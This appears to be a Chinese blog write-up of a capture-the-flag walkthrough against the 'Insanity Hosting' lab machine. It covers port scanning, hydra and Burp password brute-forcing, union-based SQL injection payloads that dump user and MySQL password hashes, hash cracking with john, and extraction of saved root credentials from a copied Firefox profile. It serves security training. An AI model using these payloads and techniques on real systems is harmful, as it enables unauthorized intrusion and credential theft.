Insanity Hosting 靶机

Insanity Hosting

1.探测靶机ip地址

ip a

image-20220706102229228

netdiscover -i eth0 -r 192.168.100.0/24

image-20220706143326008

可以看到靶机地址为192.168.100.9

2.nmap进行靶机端口服务扫描

nmap -sS -Pn -A -p- -n 192.168.100.9
-sS  SYN 扫描,半连接
-Pn 跳过Ping扫描阶段
-A   全面扫描
-p- 全端口
-n   禁止DNS反向解析,如果单纯扫描一段IP,该选项可以大幅度减少目标主机响应时间

可以看到靶机开放了21/ftp、22/ssh、80/http端口

image-20220706143925681

3.根据端口服务进行信息收集

(1)21/ftp端口

搜索下vsftpd3.0.2有没有啥已有漏洞

searchslopit vsftpd

image-20220706145423729

没啥

看看匿名登录里面有没有啥有用的文件

image-20220706150004438

也没啥能用到的

(2)22/ssh端口

也没啥

image-20220706150117885

(3)80/http端口

我们访问下80页面进行下信息收集:查看源码、dirb扫描

image-20220706150212771

dirsearch -u http://192.168.100.9

image-20220706151119862

dirb http://192.168.100.9

image-20220706151207081

4.漏洞利用

扫出来几个页面

http://192.168.100.9/monitoring/
http://192.168.100.9/phpmyadmin/
http://192.168.100.9/webmail/
http://192.168.100.9/news/
http://192.168.100.9/phpmyadmin/

1.phpmyadmin存在匿名登陆

可以匿名登录,但是登上去没啥东西啊

image-20220706152739298

http://192.168.100.9/news/

可以看到泄露了一个用户名Otis,可能在monitoring/login.php中用于爆破

image-20220706152857384

http://192.168.100.9/monitoring/login.php

2.密码爆破

(1)bp爆破(注意重定向)

试下之前的用户名,抓包爆破下

image-20220707095531561

image-20220707095604727

image-20220707095646332

可以看到响应码为302存在重定向

intruder-->options-->redirection选择always

image-20220707095934309

之后选择password进行爆破

image-20220707100625101

可以看到123456 redirects followed不一致

去页面试一下

(2)hydra爆破(注意参数)
hydra -l Otis -P /usr/share/seclists/Passwords/2020-200_most_used_passwords.txt 192.168.100.9 http-post-form '/monitoring/index.php:username=^USER^&password=^PASS^:Sign In'
hydra <参数> <IP地址> <服务名>
-l #指定用户名
-P #大写,指定密码字典
需要判断重定向后不为Sign In的
s=的是密码正确时返回应用的关键字符串

image-20220707103746675

可以看到爆破结果是一样的

3.sql注入

弱密码同样适用于邮箱

image-20220707105719575

看下可以在monitoring中新建一些参数

image-20220707105921781

新建一个test 123456试试

image-20220707110045210

可以看到邮箱会收到邮件

image-20220707112229555

找注入点

(手注真的累死人)

' or 1=1 #     失败,收不到邮件
" or 1=1 # 成功,正常收到回显邮件

image-20220708094225121

sql不对是没有回显邮件的,开始测试

因为有4个回显点

ID,Host,Date Time,Status

image-20220708094331152

1" union select group_concat(schema_name),2,3,4 from information_schema.schemata #
"information_schema,monitoring,mysql,performance_schema"

image-20220708103828449

 

1" union select group_concat(table_name),2,3,4 from information_schema.tables where table_schema=database()#
"hosts,log,users"

 

接下来搞列名

1" union select group_concat(column_name),2,3,4 from information_schema.columns
where table_name='users' #
"id,username,password,email"

image-20220708105048349

获取用户名,密码

1" union select 1,2,3,group_concat(username,password) from users
"admin$2y$12$huPSQmbcMvgHDkWIMnk9t.1cLoBWue3dtHf9E5cKUNcfKTOOp8cma,
nicholas$2y$12$4R6JiYMbJ7NKnuQEoQW4ruIcuRJtDRukH.Tvx52RkUfx5eloIw7Qe,
otis$2y$12$./XCeHl0/TCPW5zN/E9w0ecUUKbDomwjQ0yZqGz5tgASgZg6SIHFW"

image-20220708100054593

把hash保存下,用john跑一下

image-20220708101602012

发现没解出hash值

换个思路

这个表没东西,想想是不是还有啥没发现的表

mysql中mysql.user用户表

1" union select 1,user,password,authentication_string from mysql.user # 
1,root,*CDA244FF510B063DA17DFF84FF39BA0849F7920F,
1,,,
1,elliot,,*5A5749F309CAC33B27BA94EE02168FA3C3E7A3E9
mysql中密码有password,authentication_string(新版本)

image-20220708102854486

再使用john解密下

john hash.txt

image-20220708103146095

解出来

elliot123        (elliot)

4.ssh连接

image-20220708105252305

执行命令看看

[elliot@insanityhosting ~]$ whoami
elliot
[elliot@insanityhosting ~]$ id
uid=1003(elliot) gid=1003(elliot) 组=1003(elliot)
[elliot@insanityhosting ~]$ ls -al
总用量 16
drwx------. 5 elliot elliot 144 8月 16 2020 .
drwxr-xr-x. 7 root root 76 8月 16 2020 ..
lrwxrwxrwx. 1 root root 9 8月 16 2020 .bash_history -> /dev/null
-rw-r--r--. 1 elliot elliot 18 4月 1 2020 .bash_logout
-rw-r--r--. 1 elliot elliot 193 4月 1 2020 .bash_profile
-rw-r--r--. 1 elliot elliot 231 4月 1 2020 .bashrc
drwx------. 3 elliot elliot 21 8月 16 2020 .cache
drwx------. 5 elliot elliot 66 8月 16 2020 .mozilla
drwx------. 2 elliot elliot 25 8月 16 2020 .ssh
-rw-------. 1 elliot elliot 100 8月 16 2020 .Xauthority
[elliot@insanityhosting ~]$ cat .bash_history
[elliot@insanityhosting ~]$

.bash_history没东西

发现存在一个火狐的缓存文件,可能保存账号密码

image-20220708105546599

pwd看下目录,将这个缓存文件拉下来

scp -r elliot@192.168.100.9:/home/elliot/.mozilla /root/

image-20220708112438710

5.火狐密码破解工具

火狐密码导出工具

https://github.com/lclevy/firepwd

火狐导出工具2

https://github.com/unode/firefox_decrypt
python firepwd.py -d /root/.mozilla/firefox/esmhp32w.default-default

image-20220708112854401

可以看到root的密码

ssh登录root

S8Y389KJqWpJuSwFqFZHwfZ3GnegUa

image-20220708113205914

5.靶机总结

信息泄露 | 弱密码 | SQL注入 | Firefox配置解密

© 版权声明
THE END
喜欢就支持一下吧
点赞11 分享
评论 共2条

请登录后发表评论

    请登录后查看评论内容